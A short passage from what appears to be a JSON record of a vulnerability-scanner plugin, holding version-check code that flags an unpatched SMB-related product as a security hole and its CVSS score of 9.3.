keep:FALSE);\nfor (i=0; i<max_index(fix); i++)\n fix[i] = int(fix[i]);\n\nfor (i=0; i<max_index(ver); i++)\n if ((ver[i] < fix[i]))\n {\n security_hole(get_kb_item(\"SMB/transport\"));\n break;\n }\n else if (ver[i] > fix[i])\n break;\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
